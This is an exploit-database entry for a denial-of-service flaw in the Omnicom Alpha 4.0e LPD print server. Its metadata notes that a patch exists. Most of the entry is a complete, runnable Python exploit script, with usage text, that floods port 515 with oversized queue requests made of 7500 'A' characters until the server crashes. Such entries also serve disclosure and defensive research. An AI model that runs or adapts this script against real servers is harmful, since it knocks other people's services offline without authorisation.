header-logo
Suggest Exploit
vendor:
Alpha
by:
Craig Freyman
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Alpha
Affected Version From: 4.0e
Affected Version To: 4.0e
Patch Exists: YES
Related CWE: N/A
CPE: a:omnicomtech:alpha_4.0e
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3 (English), Server 2003 SP2 (English)
2011

Omnicom Alpha 4.0e LPD Server DoS

This exploit causes a denial of service on Omnicom Alpha 4.0e LPD Server by sending a large number of requests with a large payload. The payload is composed of a queue name followed by a large number of 'A' characters. The exploit requires knowledge of the name of a printer queue on the server.

Mitigation:

The vendor has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

#!/usr/bin/python
#Title: Omnicom Alpha 4.0e LPD Server DoS
#Author: Craig Freyman (@cd1zz)
#Software Download: http://www.omnicomtech.com/download/bin/lpd.exe
#Tested on: Windows XP SP3 (English), Server 2003 SP2 (English)
#Dates: Bug Found 7/27/2011, Vendor Notified 8/1/2011, Vendor Responded 8/2/2011, Vendor approved release 8/3/2011
#Notes: For this exploit to work, you must know the name of a printer queue on the server. 

import socket,sys,time

if len(sys.argv) < 3:
	print "[-]Usage: %s <target addr> <queue name>" % sys.argv[0]
	sys.exit(0)

target = sys.argv[1]
queue = sys.argv[2]

counter = 1
crash = "\x41" * 7500

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

try:
	while counter<=50:
		print "[*] Left jab "+str(counter)+" times."
		s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
		s.connect((target,515))
		s.send("\x02"+queue+" "+crash+"LF")
		time.sleep(.25)
		counter+=1
except:
    	print "[-] "+target+" has been knocked out with a right hook!"
    	sys.exit(0)